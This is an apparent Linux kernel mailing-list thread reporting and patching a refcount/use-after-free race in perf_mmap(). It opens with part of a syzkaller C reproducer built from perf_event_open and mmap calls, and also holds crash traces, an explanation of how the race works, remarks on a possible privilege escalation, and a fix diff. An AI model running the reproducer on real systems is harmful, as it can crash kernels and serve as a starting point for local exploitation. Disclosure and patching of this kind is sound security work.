// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Mon, Feb 02, 2026 at 03:44:35PM +0800, Haocheng Yu wrote:
So you're saying this is something like:
  Thread-1                      Thread-2
  mmap(fd)
                                close(fd) / ioctl(fd, IOC_SET_OUTPUT)
I don't think close() is possible, because mmap() should have a
reference on the struct file from fget(), no?
That leaves the ioctl(), let me go have a peek.
|
{
"author": "Peter Zijlstra <peterz@infradead.org>",
"date": "Mon, 2 Feb 2026 14:58:59 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger reference-count saturation or a use-after-free (UAF) in the perf_mmap() function. The root cause is a race condition in which a ring_buffer object's reference count is incremented after it has already dropped to zero.
The bug is in perf_mmap() in kernel/events/core.c. The function takes mmap_mutex to protect the initial buffer setup, but it performs subsequent operations (such as map_range()) on event->rb outside the locked scope. If the event is closed or the buffer is detached concurrently, the ring_buffer's reference count can drop to zero during that window, producing an 'addition on 0' warning or a UAF when the kernel later accesses or increments it.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires mmap_mutex to set up the buffer and then drops it. Meanwhile, Thread B (or the main loop) closes the descriptor or modifies the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering reference-count saturation or a use-after-free (UAF) condition. The immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage the UAF state for heap grooming. If the freed memory is reallocated with an attacker-controlled structure, the bug could potentially be exploited for local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang University

Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
